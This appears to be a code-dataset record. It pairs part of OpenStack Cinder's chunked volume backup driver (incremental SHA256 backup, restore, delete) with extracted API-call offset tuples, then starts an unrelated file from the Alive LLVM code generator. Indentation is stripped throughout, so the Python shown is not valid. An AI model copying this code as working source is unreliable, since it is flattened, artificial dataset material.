object_list = object_meta['list']
object_id = object_meta['id']
object_name = '%s-%05d' % (object_prefix, object_id)
obj = {}
obj[object_name] = {}
obj[object_name]['offset'] = data_offset
obj[object_name]['length'] = len(data)
LOG.debug('reading chunk of data from volume')
if self.compressor is not None:
algorithm = CONF.backup_compression_algorithm.lower()
obj[object_name]['compression'] = algorithm
data_size_bytes = len(data)
data = self.compressor.compress(data)
comp_size_bytes = len(data)
LOG.debug('compressed %(data_size_bytes)d bytes of data '
'to %(comp_size_bytes)d bytes using '
'%(algorithm)s',
{
'data_size_bytes': data_size_bytes,
'comp_size_bytes': comp_size_bytes,
'algorithm': algorithm,
})
else:
LOG.debug('not compressing data')
obj[object_name]['compression'] = 'none'
LOG.debug('About to put_object')
with self.get_object_writer(
container, object_name, extra_metadata=extra_metadata
) as writer:
writer.write(data)
md5 = hashlib.md5(data).hexdigest()
obj[object_name]['md5'] = md5
LOG.debug('backup MD5 for %(object_name)s: %(md5)s',
{'object_name': object_name, 'md5': md5})
object_list.append(obj)
object_id += 1
object_meta['list'] = object_list
object_meta['id'] = object_id
LOG.debug('Calling eventlet.sleep(0)')
eventlet.sleep(0)
def _finalize_backup(self, backup, container, object_meta, object_sha256):
"""Write the backup's metadata to the backup repository."""
object_list = object_meta['list']
object_id = object_meta['id']
volume_meta = object_meta['volume_meta']
sha256_list = object_sha256['sha256s']
extra_metadata = object_meta.get('extra_metadata')
self._write_sha256file(backup,
backup['volume_id'],
container,
sha256_list)
self._write_metadata(backup,
backup['volume_id'],
container,
object_list,
volume_meta,
extra_metadata)
self.db.backup_update(self.context, backup['id'],
{'object_count': object_id})
LOG.debug('backup %s finished.', backup['id'])
def _backup_metadata(self, backup, object_meta):
"""Backup volume metadata.
NOTE(dosaboy): the metadata we are backing up is obtained from a
versioned api so we should not alter it in any way here.
We must also be sure that the service that will perform
the restore is compatible with version used.
"""
json_meta = self.get_metadata(backup['volume_id'])
if not json_meta:
LOG.debug("No volume metadata to backup.")
return
object_meta["volume_meta"] = json_meta
def _send_progress_end(self, context, backup, object_meta):
object_meta['backup_percent'] = 100
volume_utils.notify_about_backup_usage(context,
backup,
"createprogress",
extra_usage_info=
object_meta)
def _send_progress_notification(self, context, backup, object_meta,
total_block_sent_num, total_volume_size):
backup_percent = total_block_sent_num * 100 / total_volume_size
object_meta['backup_percent'] = backup_percent
volume_utils.notify_about_backup_usage(context,
backup,
"createprogress",
extra_usage_info=
object_meta)
def backup(self, backup, volume_file, backup_metadata=True):
"""Backup the given volume.
If backup['parent_id'] is given, then an incremental backup
is performed.
"""
if self.chunk_size_bytes % self.sha_block_size_bytes:
err = _('Chunk size is not multiple of '
'block size for creating hash.')
raise exception.InvalidBackup(reason=err)
# Read the shafile of the parent backup if backup['parent_id']
# is given.
parent_backup_shafile = None
parent_backup = None
if backup['parent_id']:
parent_backup = self.db.backup_get(self.context,
backup['parent_id'])
parent_backup_shafile = self._read_sha256file(parent_backup)
parent_backup_shalist = parent_backup_shafile['sha256s']
if (parent_backup_shafile['chunk_size'] !=
self.sha_block_size_bytes):
err = (_('Hash block size has changed since the last '
'backup. New hash block size: %(new)s. Old hash '
'block size: %(old)s. Do a full backup.')
% {'old': parent_backup_shafile['chunk_size'],
'new': self.sha_block_size_bytes})
raise exception.InvalidBackup(reason=err)
# If the volume size increased since the last backup, fail
# the incremental backup and ask user to do a full backup.
if backup['size'] > parent_backup['size']:
err = _('Volume size increased since the last '
'backup. Do a full backup.')
raise exception.InvalidBackup(reason=err)
(object_meta, object_sha256, extra_metadata, container,
volume_size_bytes) = self._prepare_backup(backup)
counter = 0
total_block_sent_num = 0
# There are two mechanisms to send the progress notification.
# 1. The notifications are periodically sent in a certain interval.
# 2. The notifications are sent after a certain number of chunks.
# Both of them are working simultaneously during the volume backup,
# when swift is taken as the backup backend.
def _notify_progress():
self._send_progress_notification(self.context, backup,
object_meta,
total_block_sent_num,
volume_size_bytes)
timer = loopingcall.FixedIntervalLoopingCall(
_notify_progress)
if self.enable_progress_timer:
timer.start(interval=self.backup_timer_interval)
sha256_list = object_sha256['sha256s']
shaindex = 0
while True:
data_offset = volume_file.tell()
data = volume_file.read(self.chunk_size_bytes)
if data == '':
break
# Calculate new shas with the datablock.
shalist = []
off = 0
datalen = len(data)
while off < datalen:
chunk_start = off
chunk_end = chunk_start + self.sha_block_size_bytes
if chunk_end > datalen:
chunk_end = datalen
chunk = data[chunk_start:chunk_end]
sha = hashlib.sha256(chunk).hexdigest()
shalist.append(sha)
off += self.sha_block_size_bytes
sha256_list.extend(shalist)
# If parent_backup is not None, that means an incremental
# backup will be performed.
if parent_backup:
# Find the extent that needs to be backed up.
extent_off = -1
for idx, sha in enumerate(shalist):
if sha != parent_backup_shalist[shaindex]:
if extent_off == -1:
# Start of new extent.
extent_off = idx * self.sha_block_size_bytes
else:
if extent_off != -1:
# We've reached the end of extent.
extent_end = idx * self.sha_block_size_bytes
segment = data[extent_off:extent_end]
self._backup_chunk(backup, container, segment,
data_offset + extent_off,
object_meta,
extra_metadata)
extent_off = -1
shaindex += 1
# The last extent extends to the end of data buffer.
if extent_off != -1:
extent_end = datalen
segment = data[extent_off:extent_end]
self._backup_chunk(backup, container, segment,
data_offset + extent_off,
object_meta, extra_metadata)
extent_off = -1
else: # Do a full backup.
self._backup_chunk(backup, container, data, data_offset,
object_meta, extra_metadata)
# Notifications
total_block_sent_num += self.data_block_num
counter += 1
if counter == self.data_block_num:
# Send the notification to Ceilometer when the chunk
# number reaches the data_block_num. The backup percentage
# is put in the metadata as the extra information.
self._send_progress_notification(self.context, backup,
object_meta,
total_block_sent_num,
volume_size_bytes)
# Reset the counter
counter = 0
# Stop the timer.
timer.stop()
# All the data have been sent, the backup_percent reaches 100.
self._send_progress_end(self.context, backup, object_meta)
object_sha256['sha256s'] = sha256_list
if backup_metadata:
try:
self._backup_metadata(backup, object_meta)
# Whatever goes wrong, we want to log, cleanup, and re-raise.
except Exception as err:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Backup volume metadata failed: %s."),
err)
self.delete(backup)
self._finalize_backup(backup, container, object_meta, object_sha256)
def _restore_v1(self, backup, volume_id, metadata, volume_file):
"""Restore a v1 volume backup."""
backup_id = backup['id']
LOG.debug('v1 volume backup restore of %s started.', backup_id)
extra_metadata = metadata.get('extra_metadata')
container = backup['container']
metadata_objects = metadata['objects']
metadata_object_names = sum((obj.keys() for obj in metadata_objects),
[])
LOG.debug('metadata_object_names = %s.', metadata_object_names)
prune_list = [self._metadata_filename(backup),
self._sha256_filename(backup)]
object_names = [object_name for object_name in
self._generate_object_names(backup)
if object_name not in prune_list]
if sorted(object_names) != sorted(metadata_object_names):
err = _('restore_backup aborted, actual object list '
'does not match object list stored in metadata.')
raise exception.InvalidBackup(reason=err)
for metadata_object in metadata_objects:
object_name = metadata_object.keys()[0]
LOG.debug('restoring object. backup: %(backup_id)s, '
'container: %(container)s, object name: '
'%(object_name)s, volume: %(volume_id)s.',
{
'backup_id': backup_id,
'container': container,
'object_name': object_name,
'volume_id': volume_id,
})
with self.get_object_reader(
container, object_name,
extra_metadata=extra_metadata) as reader:
body = reader.read()
compression_algorithm = metadata_object[object_name]['compression']
decompressor = self._get_compressor(compression_algorithm)
volume_file.seek(metadata_object.values()[0]['offset'])
if decompressor is not None:
LOG.debug('decompressing data using %s algorithm',
compression_algorithm)
decompressed = decompressor.decompress(body)
volume_file.write(decompressed)
else:
volume_file.write(body)
# force flush every write to avoid long blocking write on close
volume_file.flush()
# Be tolerant to IO implementations that do not support fileno()
try:
fileno = volume_file.fileno()
except IOError:
LOG.info(_LI("volume_file does not support "
"fileno() so skipping "
"fsync()"))
else:
os.fsync(fileno)
# Restoring a backup to a volume can take some time. Yield so other
# threads can run, allowing for among other things the service
# status to be updated
eventlet.sleep(0)
LOG.debug('v1 volume backup restore of %s finished.',
backup_id)
def restore(self, backup, volume_id, volume_file):
"""Restore the given volume backup from backup repository."""
backup_id = backup['id']
container = backup['container']
object_prefix = backup['service_metadata']
LOG.debug('starting restore of backup %(object_prefix)s '
'container: %(container)s, to volume %(volume_id)s, '
'backup: %(backup_id)s.',
{
'object_prefix': object_prefix,
'container': container,
'volume_id': volume_id,
'backup_id': backup_id,
})
metadata = self._read_metadata(backup)
metadata_version = metadata['version']
LOG.debug('Restoring backup version %s', metadata_version)
try:
restore_func = getattr(self, self.DRIVER_VERSION_MAPPING.get(
metadata_version))
except TypeError:
err = (_('No support to restore backup version %s')
% metadata_version)
raise exception.InvalidBackup(reason=err)
# Build a list of backups based on parent_id. A full backup
# will be the last one in the list.
backup_list = []
backup_list.append(backup)
current_backup = backup
while current_backup['parent_id']:
prev_backup = (self.db.backup_get(
self.context, current_backup['parent_id']))
backup_list.append(prev_backup)
current_backup = prev_backup
# Do a full restore first, then layer the incremental backups
# on top of it in order.
index = len(backup_list) - 1
while index >= 0:
backup1 = backup_list[index]
index = index - 1
metadata = self._read_metadata(backup1)
restore_func(backup1, volume_id, metadata, volume_file)
volume_meta = metadata.get('volume_meta', None)
try:
if volume_meta:
self.put_metadata(volume_id, volume_meta)
else:
LOG.debug("No volume metadata in this backup.")
except exception.BackupMetadataUnsupportedVersion:
msg = _("Metadata restore failed due to incompatible version.")
LOG.error(msg)
raise exception.BackupOperationError(msg)
LOG.debug('restore %(backup_id)s to %(volume_id)s finished.',
{'backup_id': backup_id, 'volume_id': volume_id})
def delete(self, backup):
"""Delete the given backup."""
container = backup['container']
LOG.debug('delete started, backup: %(id)s, container: %(cont)s, '
'prefix: %(pre)s.',
{'id': backup['id'],
'cont': container,
'pre': backup['service_metadata']})
if container is not None:
object_names = []
try:
object_names = self._generate_object_names(backup)
except Exception:
LOG.warning(_LW('swift error while listing objects, continuing'
' with delete.'))
for object_name in object_names:
self.delete_object(container, object_name)
LOG.debug('deleted object: %(object_name)s'
' in container: %(container)s.',
{
'object_name': object_name,
'container': container
})
# Deleting a backup's objects can take some time.
# Yield so other threads can run
eventlet.sleep(0)
LOG.debug('delete %s finished.', backup['id'])
|
[
"oslo_log.log.getLogger",
"os.fsync",
"json.dumps",
"six.add_metaclass",
"cinder.openstack.common.loopingcall.FixedIntervalLoopingCall",
"cinder.i18n._LW",
"cinder.i18n._LI",
"cinder.exception.InvalidBackup",
"cinder.exception.InvalidVolume",
"cinder.i18n._LE",
"json.loads",
"cinder.volume.utils.notify_about_backup_usage",
"hashlib.sha256",
"cinder.i18n._",
"hashlib.md5",
"oslo_config.cfg.StrOpt",
"six.text_type",
"oslo_utils.excutils.save_and_reraise_exception",
"cinder.exception.BackupOperationError",
"eventlet.sleep"
] |
[((1312, 1339), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1329, 1339), True, 'from oslo_log import log as logging\n'), ((1583, 1613), 'six.add_metaclass', 'six.add_metaclass', (['abc.ABCMeta'], {}), '(abc.ABCMeta)\n', (1600, 1613), False, 'import six\n'), ((1376, 1487), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (['"""backup_compression_algorithm"""'], {'default': '"""zlib"""', 'help': '"""Compression algorithm (None to disable)"""'}), "('backup_compression_algorithm', default='zlib', help=\n 'Compression algorithm (None to disable)')\n", (1386, 1487), False, 'from oslo_config import cfg\n'), ((7608, 7654), 'json.dumps', 'json.dumps', (['metadata'], {'sort_keys': '(True)', 'indent': '(2)'}), '(metadata, sort_keys=True, indent=2)\n', (7618, 7654), False, 'import json\n'), ((8500, 8535), 'six.text_type', 'six.text_type', (["backup['created_at']"], {}), "(backup['created_at'])\n", (8513, 8535), False, 'import six\n'), ((8667, 8715), 'json.dumps', 'json.dumps', (['sha256file'], {'sort_keys': '(True)', 'indent': '(2)'}), '(sha256file, sort_keys=True, indent=2)\n', (8677, 8715), False, 'import json\n'), ((9330, 9355), 'json.loads', 'json.loads', (['metadata_json'], {}), '(metadata_json)\n', (9340, 9355), False, 'import json\n'), ((9914, 9941), 'json.loads', 'json.loads', (['sha256file_json'], {}), '(sha256file_json)\n', (9924, 9941), False, 'import json\n'), ((13790, 13807), 'eventlet.sleep', 'eventlet.sleep', (['(0)'], {}), '(0)\n', (13804, 13807), False, 'import eventlet\n'), ((15522, 15629), 'cinder.volume.utils.notify_about_backup_usage', 'volume_utils.notify_about_backup_usage', (['context', 'backup', '"""createprogress"""'], {'extra_usage_info': 'object_meta'}), "(context, backup, 'createprogress',\n extra_usage_info=object_meta)\n", (15560, 15629), True, 'from cinder.volume import utils as volume_utils\n'), ((16101, 16208), 'cinder.volume.utils.notify_about_backup_usage', 'volume_utils.notify_about_backup_usage', (['context', 'backup', '"""createprogress"""'], {'extra_usage_info': 'object_meta'}), "(context, backup, 'createprogress',\n extra_usage_info=object_meta)\n", (16139, 16208), True, 'from cinder.volume import utils as volume_utils\n'), ((18997, 19051), 'cinder.openstack.common.loopingcall.FixedIntervalLoopingCall', 'loopingcall.FixedIntervalLoopingCall', (['_notify_progress'], {}), '(_notify_progress)\n', (19033, 19051), False, 'from cinder.openstack.common import loopingcall\n'), ((2581, 2623), 'cinder.i18n._', '_', (['"""unsupported compression algorithm: %s"""'], {}), "('unsupported compression algorithm: %s')\n", (2582, 2623), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((10398, 10433), 'cinder.exception.InvalidVolume', 'exception.InvalidVolume', ([], {'reason': 'err'}), '(reason=err)\n', (10421, 10433), False, 'from cinder import exception\n'), ((16685, 16749), 'cinder.i18n._', '_', (['"""Chunk size is not multiple of block size for creating hash."""'], {}), "('Chunk size is not multiple of block size for creating hash.')\n", (16686, 16749), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((16791, 16826), 'cinder.exception.InvalidBackup', 'exception.InvalidBackup', ([], {'reason': 'err'}), '(reason=err)\n', (16814, 16826), False, 'from cinder import exception\n'), ((24108, 24207), 'cinder.i18n._', '_', (['"""restore_backup aborted, actual object list does not match object list stored in metadata."""'], {}), "('restore_backup aborted, actual object list does not match object list stored in metadata.'\n )\n", (24109, 24207), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((24244, 24279), 'cinder.exception.InvalidBackup', 'exception.InvalidBackup', ([], {'reason': 'err'}), '(reason=err)\n', (24267, 24279), False, 'from cinder import exception\n'), ((26245, 26262), 'eventlet.sleep', 'eventlet.sleep', (['(0)'], {}), '(0)\n', (26259, 26262), False, 'import eventlet\n'), ((10331, 10362), 'cinder.i18n._', '_', (['"""volume size %d is invalid."""'], {}), "('volume size %d is invalid.')\n", (10332, 10362), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((13410, 13427), 'hashlib.md5', 'hashlib.md5', (['data'], {}), '(data)\n', (13421, 13427), False, 'import hashlib\n'), ((17757, 17792), 'cinder.exception.InvalidBackup', 'exception.InvalidBackup', ([], {'reason': 'err'}), '(reason=err)\n', (17780, 17792), False, 'from cinder import exception\n'), ((18012, 18079), 'cinder.i18n._', '_', (['"""Volume size increased since the last backup. Do a full backup."""'], {}), "('Volume size increased since the last backup. Do a full backup.')\n", (18013, 18079), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((18129, 18164), 'cinder.exception.InvalidBackup', 'exception.InvalidBackup', ([], {'reason': 'err'}), '(reason=err)\n', (18152, 18164), False, 'from cinder import exception\n'), ((26025, 26041), 'os.fsync', 'os.fsync', (['fileno'], {}), '(fileno)\n', (26033, 26041), False, 'import os\n'), ((27449, 27484), 'cinder.exception.InvalidBackup', 'exception.InvalidBackup', ([], {'reason': 'err'}), '(reason=err)\n', (27472, 27484), False, 'from cinder import exception\n'), ((30102, 30119), 'eventlet.sleep', 'eventlet.sleep', (['(0)'], {}), '(0)\n', (30116, 30119), False, 'import eventlet\n'), ((17414, 17552), 'cinder.i18n._', '_', (['"""Hash block size has changed since the last backup. New hash block size: %(new)s. Old hash block size: %(old)s. Do a full backup."""'], {}), "('Hash block size has changed since the last backup. New hash block size: %(new)s. Old hash block size: %(old)s. Do a full backup.'\n )\n", (17415, 17552), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((27347, 27391), 'cinder.i18n._', '_', (['"""No support to restore backup version %s"""'], {}), "('No support to restore backup version %s')\n", (27348, 27391), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((28630, 28687), 'cinder.i18n._', '_', (['"""Metadata restore failed due to incompatible version."""'], {}), "('Metadata restore failed due to incompatible version.')\n", (28631, 28687), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((28741, 28776), 'cinder.exception.BackupOperationError', 'exception.BackupOperationError', (['msg'], {}), '(msg)\n', (28771, 28776), False, 'from cinder import exception\n'), ((19827, 19848), 'hashlib.sha256', 'hashlib.sha256', (['chunk'], {}), '(chunk)\n', (19841, 19848), False, 'import hashlib\n'), ((22920, 22957), 'oslo_utils.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (22955, 22957), False, 'from oslo_utils import excutils\n'), ((25861, 25925), 'cinder.i18n._LI', '_LI', (['"""volume_file does not support fileno() so skipping fsync()"""'], {}), "('volume_file does not support fileno() so skipping fsync()')\n", (25864, 25925), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((29477, 29542), 'cinder.i18n._LW', '_LW', (['"""swift error while listing objects, continuing with delete."""'], {}), "('swift error while listing objects, continuing with delete.')\n", (29480, 29542), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((22993, 23034), 'cinder.i18n._LE', '_LE', (['"""Backup volume metadata failed: %s."""'], {}), "('Backup volume metadata failed: %s.')\n", (22996, 23034), False, 'from cinder.i18n import _, _LE, _LI, _LW\n')]
|
# Copyright 2014-2015 The Alive authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse, glob, re, sys
from asdl.lang.alive_lang.alive.language import *
from asdl.lang.alive_lang.alive.precondition import *
from asdl.lang.alive_lang.alive.parser import parse_opt_file
from asdl.lang.alive_lang.alive.codegen import *
from itertools import combinations, count
from collections import defaultdict
DO_STATS = True
SIMPLIFY = True
LIMITER = False
def get_most_specific_type(t1, t2):
def _mismatch(c):
if c:
raise AliveError('Incomparable types: {0}, {1}'.format(type_str(t1), type_str(t2)))
if isinstance(t1, UnknownType):
try:
if isinstance(t2, IntType):
return get_most_specific_type(t1.types[Type.Int], t2)
if isinstance(t2, PtrType):
return get_most_specific_type(t1.types[Type.Ptr], t2)
if isinstance(t2, ArrayType):
return get_most_specific_type(t1.types[Type.Array], t2)
except KeyError:
_mismatch(True)
# TODO: return t1 or t2 when possible?
types = [(s, get_most_specific_type(t, t2.types[s]))
for (s,t) in t1.types.items() if s in t2.types]
_mismatch(not types)
if len(types) == 1:
return types[0][1]
t3 = UnknownType()
t3.types = dict(types)
return t3
if isinstance(t2, UnknownType):
return get_most_specific_type(t2,t1)
_mismatch(t1.__class__ != t2.__class__)
if isinstance(t1, IntType):
_mismatch(t1.defined and t2.defined and
t1.getSize() != t2.getSize())
return t1 if t1.defined else t2
if isinstance(t1, PtrType):
# TODO: return t1 or t2 when possible?
return PtrType(get_most_specific_type(t1.type, t2.type))
if isinstance(t1, ArrayType):
#sys.stderr.write('WARNING: get_most_specific_type of ArrayTypes\n')
return t1 # FIXME
#TODO: array types?
_mismatch(True)
class CodeGenerator(object):
Source, Target = list(range(2))
PtrConstantInt = CPtrType(CTypeName('ConstantInt'))
PtrValue = CPtrType(CTypeName('Value'))
PtrInstruction = CPtrType(CTypeName('Instruction'))
def __init__(self):
self.fresh = 0
self.value_names = {} # value -> name
self.key_names = {} # key -> name
self.names = set() # all created names
self.name_type = {} # name -> ctype
self.reps = {} # value -> value
self.required = {} # value -> type
self.guaranteed = {} # value -> type
self.named_types = defaultdict(set)
self.phase = CodeGenerator.Source
self.clauses = []
def dump(self, title):
from pprint import pprint
def lookup(v):
if v == None: return None
return self.value_names.get(v, '<' + v.getUniqueName() + '>')
print('----', title)
print('value_names:', end=' ')
pprint(set([(v.getUniqueName(),n) for v,n in self.value_names.items()]))
print('key_names:', end=' ')
pprint(self.key_names)
print('names:', end=' ')
pprint(self.names)
print('bound: ', end=' ')
pprint(dict([(n,str(t)) for (n,t) in self.name_type.items()]))
print('reps:', end=' ')
pprint(dict([(lookup(v), lookup(r)) for (v,r) in self.reps.items()]))
print('required:', end=' ')
pprint(dict([(lookup(v), type_str(t)) for v,t in self.required.items()]))
print('guaranteed:', end=' ')
pprint(dict([(lookup(v), type_str(t)) for v,t in self.guaranteed.items()]))
print('named_types:', end=' ')
pprint(self.named_types)
print('----')
def get_name(self, value):
'Return the name for this value, creating one if needed'
assert isinstance(value, (Input, Instr))
if value in self.value_names:
return self.value_names[value]
name = self.new_name(value.getName())
self.value_names[value] = name
return name
def get_key_name(self, key):
'Return the name for this key, creating one if needed'
if key in self.key_names:
return self.key_names[key]
name = self.new_name(key)
self.key_names[key] = name
return name
def bound(self, var):
'Returns whether the name or value is currently bound'
if isinstance(var, Value):
return var in self.value_names and \
self.value_names[var] in self.name_type
return var in self.name_type
def get_cexp(self, var):
'Return a CExp referring to this name or value'
if isinstance(var, Constant):
return var.get_Value(self)
if isinstance(var, Value):
var = self.get_name(var)
#assert var in self.name_type
return CVariable(var)
def get_rep(self, value):
"Return the representative for this value's type"
if value not in self.reps:
self.reps[value] = None
return value
if self.reps[value] == None:
return value
rep = self.get_rep(self.reps[value])
self.reps[value] = rep
return rep
def get_llvm_type(self, value):
"Return a CExpression giving the value's LLVM type"
rep = self.get_rep(value)
assert(self.bound(rep))
return self.get_cexp(rep).arr('getType', [])
def get_ctype(self, name):
"Return this name's type as a CType"
return self.name_type[name]
keywords = {'alignas', 'alignof', 'and', 'and_eq',
'asm', 'auto', 'bitand', 'bitor', 'bool', 'break',
'case', 'catch', 'char', 'char16_t', 'char32_t',
'class', 'compl', 'const', 'constexpr', 'const_cast',
'continue', 'decltype', 'default', 'delete', 'do',
'double', 'dynamic_cast', 'else', 'enum', 'explicit',
'export', 'extern', 'false', 'float', 'for', 'friend',
'goto', 'if', 'inline', 'int', 'long', 'mutable',
'namespace', 'new', 'noexcept', 'not', 'not_eq',
'nullptr', 'operator', 'or', 'or_eq', 'private',
'protected', 'public', 'register', 'reinterpret_cast',
'return', 'short', 'signed', 'sizeof', 'static',
'static_assert', 'static_cast', 'struct', 'switch',
'template', 'this', 'thread_local', 'throw', 'true',
'try', 'typedef', 'typeid', 'typename', 'union',
'unsigned', 'using', 'virtual', 'void', 'volatile',
'wchar_t', 'while', 'xor', 'xor_eq'}
#TODO: add variables/macros known to be in scope?
def new_name(self, hint=None):
"Return a fresh name, related to the hint if given"
if hint:
# remove non-ident characters
hint = re.sub('[^a-zA-Z0-9_]', '', hint)
# remove double underscores and initial and final underscores
hint = re.sub('__+', '_', hint)
hint = re.sub('^_|_$', '', hint)
if not hint:
hint = 'V'
elif hint[0].isdigit() or hint in self.keywords:
hint = '_' + hint
name = hint
while name in self.names:
name = hint + '_' + str(self.fresh)
self.fresh += 1
self.names.add(name)
return name
@staticmethod
def value_ctype(value):
if isinstance(value, Input) and value.name[0] == 'C':
return CodeGenerator.PtrConstantInt
return CodeGenerator.PtrValue
def bind_value(self, value):
"Add this value to the set of bound names"
assert isinstance(value, (Input, Instr))
ctype = self.value_ctype(value)
name = self.get_name(value)
self.bind_name(name, ctype)
def bind_name(self, name, ctype):
"Add this name to the set of bound names"
assert name not in self.name_type
assert isinstance(name, str)
if name not in self.names:
name = self.new_name(name)
self.name_type[name] = ctype
def register_type(self, value, actual, minimal):
"Set the LLVM type constraints for this value"
rep = self.get_rep(value)
if isinstance(actual, NamedType):
self.named_types[actual.name].add(rep)
actual = actual.type
if isinstance(minimal, NamedType):
minimal = minimal.type # should never happen
# ensure that the actual type is at least as specific as the minimal type
actual = get_most_specific_type(actual, minimal)
if rep in self.required:
self.required[rep] = get_most_specific_type(actual, self.required[rep])
else:
self.required[rep] = actual
if self.phase == self.Source:
if rep in self.guaranteed:
self.guaranteed[rep] = get_most_specific_type(minimal, self.guaranteed[rep])
else:
self.guaranteed[rep] = minimal
def unify(self, *values):
"Constrain the given values to have the same LLVM type"
it = iter(values)
v1 = next(it)
r1 = self.get_rep(v1)
for v2 in it:
r2 = self.get_rep(v2)
if r1 is r2:
continue
if self.phase != self.Source and self.bound(r1) and self.bound(r2):
self.clauses.append(
CBinExpr('==', self.get_llvm_type(r1), self.get_llvm_type(r2)))
if self.bound(r2) and not self.bound(r1):
r1, r2 = r2, r1
self.reps[r2] = r1
if r2 in self.required:
self.required[r1] = get_most_specific_type(self.required[r1], self.required[r2])
del self.required[r2]
if r2 in self.guaranteed:
self.guaranteed[r1] = get_most_specific_type(self.guaranteed[r1], self.guaranteed[r2])
del self.guaranteed[r2]
class MatchBuilder(object):
CTypeName = CTypeName
def __init__(self, manager, value):
self.manager = manager
self.value = value
self.bound = []
self.extras = []
def get_my_ref(self):
return self.manager.get_cexp(self.value)
def new_name(self, hint=None):
'Create a fresh name'
return self.manager.new_name(hint)
def simple_match(self, matcher, *subpatterns):
return CFunctionCall('match',
self.get_my_ref(),
CFunctionCall(matcher, *subpatterns))
def binding(self, name, ctype):
'''Bind this variable, returning a CExpr subpattern.
NOTE: If the name is already bound, this will return a fresh name
and add a requirement that the new name equal the old one.
'''
if self.manager.bound(name):
# create a new name and bind it
new_name = self.manager.new_name(name)
# add the equality constraint
self.extras.append(CBinExpr('==', CVariable(new_name), CVariable(name)))
#TODO: check that the types are equal
name = new_name
self.manager.bind_name(name, ctype)
return CVariable(name)
def subpattern(self, value):
'Return a CExpr which matches the operand value and binds its variable'
if isinstance(value, ConstantVal):
self.bound.append(value)
return CFunctionCall('m_SpecificInt', CVariable(str(value.val)))
# NOTE: using m_Zero is unadvisable here, because it matches null
assert isinstance(value, (Instr, Input))
if value not in self.bound:
if self.manager.bound(value):
return CFunctionCall('m_Specific', self.manager.get_cexp(value))
self.bound.append(value)
self.manager.bind_value(value)
name = self.manager.get_name(value)
else:
# create a new value and require it equal the old one
name = self.manager.new_name(value.getName())
self.manager.bind_name(name, self.manager.value_ctype(value))
self.extras.append(CBinExpr('==', self.manager.get_cexp(value), CVariable(name)))
# TODO: better to look up the ctype?
if value.name[0] == 'C':
return CFunctionCall('m_ConstantInt', CVariable(name))
return CFunctionCall('m_Value', CVariable(name))
def type_str(atype):
if isinstance(atype, IntType):
if atype.defined:
return 'i' + str(atype.size)
return 'iN'
if isinstance(atype, PtrType):
return type_str(atype.type) + '*'
if isinstance(atype, ArrayType):
return type_str(atype.type) + '[]'
if isinstance(atype, UnknownType):
return '(' + '|'.join(type_str(t) for t in list(atype.types.values())) + ')'
return '?'
def get_root(src):
values = list(src.values())
root = values.pop()
while not isinstance(root, Instr):
root = values.pop()
return root
def match_value(value, manager):
mb = MatchBuilder(manager, value)
exp = value.visit_source(mb)
if mb.extras:
exp = CBinExpr('&&', exp, CBinExpr.reduce('&&', mb.extras))
return exp, mb.bound
def minimal_type_constraints(ty_exp, required, guaranteed):
# TODO: simplify this
if isinstance(required, IntType):
if not isinstance(guaranteed, IntType):
if required.defined:
return [CFunctionCall('isa<IntegerType>', ty_exp),
CBinExpr('==',
ty_exp.arr('getScalarSizeInBits', []),
CVariable(str(required.size)))]
return [CFunctionCall('isa<IntegerType>', ty_exp)]
if required.defined and not guaranteed.defined:
return [CBinExpr('==',
ty_exp.arr('getScalarSizeInBits', []),
CVariable(str(required.size)))]
return []
if isinstance(required, PtrType):
if not isinstance(guaranteed, PtrType):
raise AliveError("Pointer types not supported")
return []
if isinstance(required, ArrayType):
raise AliveError("Array types not supported")
assert(isinstance(required, UnknownType))
reqs = list(required.types.keys())
reqs.sort()
guars = list(guaranteed.types.keys())
guars.sort()
if reqs == [Type.Int, Type.Ptr] and Type.Array in guars:
return [CVariable('<int-or-ptr>')]
return []
#FIXME: should handle all types
def generate_opt(rule, opt, out):
#TODO: break into smaller pieces
#TODO: handle multiple replacement patterns
name, pre, src_bb, tgt_bb, src, tgt, src_used, tgt_used, tgt_skip = opt
if len(src_bb) != 1 or len(tgt_bb) != 1:
raise AliveError("codegen can't handle multiple basic blocks: " + name)
root = get_root(src)
cg = CodeGenerator()
cg.value_names[root] = 'I'
cg.bind_value(root)
todo = [root]
clauses = []
while todo:
val = todo.pop()
if isinstance(val, Instr):
exp, new_vals = match_value(val, cg)
clauses.append(exp)
todo.extend(reversed(new_vals))
val.register_types(cg)
cg.phase = cg.Target
pre.register_types(cg)
# ensure named types are unified
for name in cg.named_types:
cg.unify(*cg.named_types[name])
tgt_vals = [v for k,v in tgt.items() if not (isinstance(v,Input) or k in tgt_skip)]
for value in tgt_vals:
value.register_types(cg)
root_name = root.getName()
new_root = tgt[root_name]
cg.unify(root, new_root)
clauses.extend(cg.clauses)
for v,t in cg.guaranteed.items():
if not cg.bound(v): continue
clauses.extend(minimal_type_constraints(cg.get_llvm_type(v), cg.required[v], t))
if not isinstance(pre, TruePred):
clauses.append(pre.visit_pre(cg))
if DO_STATS and LIMITER:
clauses.append(CBinExpr('<', CVariable('Rule' + str(rule)), CVariable('10000')))
body = []
if DO_STATS:
body = [CUnaryExpr('++', CVariable('Rule' + str(rule)))]
for value in tgt_vals:
if isinstance(value, Instr) and value != new_root:
body.extend(value.visit_target(cg, True))
if isinstance(new_root, CopyOperand):
body.append(
CDefinition.init(
cg.PtrInstruction,
cg.get_cexp(tgt[root_name]),
